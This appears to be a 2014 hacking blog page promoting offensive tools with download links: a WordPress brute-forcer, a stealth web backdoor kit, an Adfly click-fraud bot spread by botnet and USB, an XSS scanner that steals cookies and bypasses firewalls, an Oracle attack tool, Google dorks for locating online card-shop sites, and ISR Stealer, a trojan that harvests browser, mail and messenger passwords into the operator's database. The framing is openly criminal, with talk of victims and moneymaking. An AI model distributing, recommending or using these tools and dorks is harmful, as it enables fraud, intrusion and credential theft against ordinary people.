Wednesday, July 9, 2014

xSecurity WordPress Brute Force MultiThreading Python


Download
###########
http://pastebin.com/raw.php?i=4BV4Kj0a

WeBaCoo (Web Backdoor Cookie)

WeBaCoo (Web Backdoor Cookie)
#########################
WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool to maintain access to a compromised web server.

WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute commands to the compromised server. The obfuscated communication is accomplished using HTTP header’s Cookie fields under valid client HTTP requests and relative web server’s responses.

The script-kit has two main operation modes: Generation and “Terminal”. Using generation mode, user can create the backdoor code containing the PHP payloads. On the other hand, at the remote “terminal” mode the client can connect to the compromised server where the backdoor PHP code has been injected. In order to establish the remote “pseudo”-shell, the user must provide the server’s URL path containing the injected code.


Source
###############
https://github.com/anestisb/WeBaCoo/zipball/master

JY Adfly Bot - The Moneymaking Bot

Make unlimited money with you botnet or other spreading methods!

Information
####################

This bot is used to making money with Adfly. All registered Adfly links are automatically called when the victims with any PC-boat in the background.

Connections to the IP address 77.66.30.215 must be blocked before use of tools! For this purpose, a firewall or the hosts file can be used.

Features
###########
Up to 6 Adfly links
USB spread
StartUp function
Icon Changer
Bypass VM & Snubis
process Killer

Download
#################
https://www.dropbox.com/s/cegiehasobrgi1m/JY_Adfly_Bot.rar

XSSYA(Cross Site Scripting Scanner & Vulnerability Confirmation)

XSSYA is a Cross Site Scripting Scanner & Vulnerability Confirmation (Working in two Methods)
• Method number 1 for Confirmation Request and Response
• Method number 2 for Confirmation Execute encoded payload and search for the same payload in web HTML code but decoded
• Support HTTPS
• After Confirmation (execute payload to get cookies)
• Identify 3 Types of WAF (Mod_Security - WebKnight - F5 BIG IP)
• Can be run in (Windows - Linux)
XSSYA Continue Library of Encoded Payloads To Bypass WAF (Web Application Firewall) It Also Support Saving the Web Html Code Before Executing the Payload Viewing the Web HTML Code into the Screen or Terminal
$ Python xssya.py
Links should end with (/or=or?)
Example
$ Python xssya.py
http://www.domain.com/ http://www.domain.com= http://www.domain.com?
The only Module need to download is colorama-0.2.7 https://pypi.python.org/pypi/colorama
Note: Crawling (need to be enhanced)
Source
#############
https://github.com/yehia-mamdouh/XSSYA

ODAT (Oracle Database Attacking Tool)

ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that test Oracle database security remotely.
Usage examples of ODAT:
You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database
You have a valid Oracle account on a database and want to escalate your privileges (ex: SYSDBA)
You have a valid Oracle account and want to execute commands on the operating system hosting this DB (ex: reverse shell)

Features
search valid SID on a remote Oracle Database listener via: a dictionary attack/a brute force attack/ALIAS of the listener
search Oracle accounts using: a dictionary attack/each Oracle user like the password
execute system commands on the database server using: DBMS_SCHEDULER/JAVA/external tables/oradbg
download files stored on the database server using: UTL_FILE/external tables/CTXSYS
upload files on the database server using: UTL_FILE/DBMS_XSLPROCESSOR/DBMS_ADVISOR
delete files using: UTL_FILE
send/reveive HTTP requests from the database server using: UTL_HTTP/HttpUriType
scan ports of the local server or a remote server using: UTL_HTTP/HttpUriType/UTL_TCP
exploit the CVE-2012-313 (CVE-2012-3137 : The authentication protocol in Oracle Database Server 10.2.0.3, 10.2.0.4, 10.2.0.5, 11.1.0.7, 11.2.0.2, and 11.2.0.3 all)
Install/Dependencies
ODAT is compatible with Linux only. A standalone version exists in order to don’t have need to install dependencies and slqplus (see the build folder of the git). The ODAT standalone has been generated thanks to pyinstaller.
If you want to have the development version installed on your computer, these following tool and dependencies are needed:
Langage: Python 2.7
Oracle dependancies: Instant Oracle basic & Instant Oracle sdk
Python libraries: cx_Oracle with the following recommended – colorlog/termcolor/argcomplete/pyinstaller

Source
###############
https://github.com/quentinhardy/odat
New CC SHOP Dorks 2014
##################################
inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy
Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys" 

inurl:".php?cat="+intext:"Paypal"+site:UK
inurl:".php?cat="+intext:"/Buy
Now/"+site:.net
inurl:".php?cid="+intext:"online+betting"
inurl:".php?id=" intext:"View cart"
inurl:".php?id=" intext:"Buy Now"
inurl:".php?id=" intext:"add to cart"
inurl:".php?id=" intext:"shopping"
inurl:".php?id=" intext:"boutique"
inurl:".php?id=" intext:"/store/"
inurl:".php?id=" intext:"/shop/"
inurl:".php?id=" intext:"toys"
inurl:".php?cid="
inurl:".php?cid=" intext:"shopping"
inurl:".php?cid=" intext:"add to cart"
inurl:".php?cid=" intext:"Buy Now"
inurl:".php?cid=" intext:"View cart"
inurl:".php?cid=" intext:"boutique"
inurl:".php?cid=" intext:"/store/"
inurl:".php?cid=" intext:"/shop/"
inurl:".php?cid=" intext:"Toys"
inurl:".php?cat="
inurl:".php?cat=" intext:"shopping"
inurl:".php?cat=" intext:"add to cart"
inurl:".php?cat=" intext:"Buy Now"
inurl:".php?cat=" intext:"View cart"
inurl:".php?cat=" intext:"boutique"
inurl:".php?cat=" intext:"/store/"
inurl:".php?cat=" intext:"/shop/"
inurl:".php?cat=" intext:"Toys"
inurl:".php?catid="
inurl:".php?catid=" intext:"View cart"
inurl:".php?catid=" intext:"Buy Now"
inurl:".php?catid=" intext:"add to cart"
inurl:".php?catid=" intext:"shopping"
inurl:".php?catid=" intext:"boutique"
inurl:".php?catid=" intext:"/store/"
inurl:".php?catid=" intext:"/shop/"
inurl:".php?catid=" intext:"Toys" 

Monday, July 7, 2014

######################################################
#ISR Stealer 0.4.1 (New Version Clean & Work 100%)
######################################################
#Made in:       Romania, Europe
#Release date:  20.08.2012
#Gfx by:        Y.xakep and Tinkode
#Credits:       Cobein, 7, Bilal Ghouri, SqUeEzEr, Rtflol and Nirsoft team.
#Beta testers : linuxgirl, zippy and wav3
#Developed for: TrojanForge.com and InSecurity.Ro

        _._._                       _._._
       _|   |_                     _|   |_
       | ... |_._._._._._._._._._._| ... |
       | ||| | o TrojanForge.com o | ||| |
        | """ |  """    """    """  | """ |
        ())  |[-|-]| [-|-]  [-|-]  [-|-] |[-|-]|  ())
 (())) |     |---------------------|     | (()))
(())())| """ |  """    """    """  | """ |(())())
(()))()|[-|-]|  :::   .-"-.   :::  |[-|-]|(()))()
         ()))(()|     | |~|~|  |_|_|  |~|~| |     |()))(()
   ||  |_____|_|_|_|__|_|_|__|_|_|_|_____|  ||
~ ~^^ @@@@@@@@@@@@@@/=======\@@@@@@@@@@@@@@ ^^~ ~
     ^~^~                                ~^~^

#Options:
+Send logs to my sql data base(php)
+Change server icon
+Steal options:
Internet Explorer (All Versions)
Mozilla Firefox (All Versions)
Google Chrome (All Versions)
Opera (All Versions)
Safari (All Versions)
VPN/Network Accounts
Yahoo Messenger 8/9/10 Password
Msn Messenger
Pidgin
Filezilla
Internet Download Manager (IDM)
jDownloader
Trillian

######################################################
#Coded by BUNNN
######################################################
Update 0.4.1
Added password recovery for:
+Outlook Express
+Microsoft Outlook 2000/2002/2003/2007/2010
+Windows Mail, windows Live Mail
+IncrediMail
+Eudora
+Netscape 6.x/7.x
+Mozilla Thunderbird
+Group Mail Free
+Yahoo! Mail - If the password is saved in Yahoo! Messenger application.
+Hotmail/MSN mail - If the password is saved in MSN/Windows/Live Messenger application.
+Gmail - If the password is saved by Gmail Notifier application, Google Desktop, or by Google Talk.
======================================================
How To Set Up ISR Stealer
################
Download Links
======================
Mediafire Link
===========
https://www.mediafire.com/?78bmbmmxcm7o02e

Dropbox Download Link
===================
https://www.dropbox.com/s/nfgdkp9q1t078ni/ISR%20Stealer%200.4.1.rar?

Ziddu Download Link
====================
http://downloads.ziddu.com/download/23890840/ISR-Stealer-0.4.1.rar.html